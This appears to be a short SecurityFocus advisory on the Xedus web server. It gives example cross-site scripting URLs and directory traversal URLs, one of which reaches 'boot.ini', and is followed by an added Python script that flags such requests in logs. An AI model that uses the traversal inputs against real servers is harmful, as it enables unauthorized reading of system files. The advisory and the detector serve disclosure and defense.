Xedus Web Server Multiple Vulnerabilities

An exploit is not required; however, examples were provided:

For the cross-site scripting vulnerabilities:
http://www.example.com:4274/test.x?username=[XSS]
http://www.example.com:4274/TestServer.x?username=[XSS]
http://www.example.com:4274/testgetrequest.x?param=[XSS]

For the directory traversal vulnerability:
http://www.example.com:4274/../data/log.txt
http://www.example.com:4274/../../../../../boot.ini
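
A log-review check for the two request patterns above, as an added example that is not part of the original advisory: it flags request targets whose `..` segments climb above the web root, and markup characters in the `username` and `param` parameters of the three listed pages. The function names, the decoding depth and the sample request targets are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Pages and parameters taken from the advisory's example URLs (lower-cased).
XSS_PARAMS = {"/test.x": "username", "/testserver.x": "username",
              "/testgetrequest.x": "param"}
MARKUP = re.compile(r"[<>\"']")  # characters that let a value break into HTML

def fully_decode(s, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e) is caught."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

def escapes_root(path):
    """True if the '..' segments of the path climb above the web root."""
    depth = 0
    for seg in re.split(r"[\\/]+", fully_decode(path)):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False

def classify(request_target):
    """Return the set of findings for one raw request target from a log."""
    parts = urlsplit(request_target)
    findings = set()
    if escapes_root(parts.path):
        findings.add("traversal")
    wanted = XSS_PARAMS.get(fully_decode(parts.path).lower())
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name == wanted and MARKUP.search(fully_decode(value)):
            findings.add("xss")
    return findings

if __name__ == "__main__":
    # Constructed sample request targets, not taken from a real log.
    for target in ["/../data/log.txt", "/%252e%252e%255cboot.ini",
                   "/TestServer.x?username=%3Cb%3E", "/test.x?username=alice"]:
        print(target, sorted(classify(target)))
```

The raw request target must be checked before any path normalization by a proxy or log shipper, since normalization removes the `..` segments the check looks for.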


 

Copyright 2010, SecurityFocus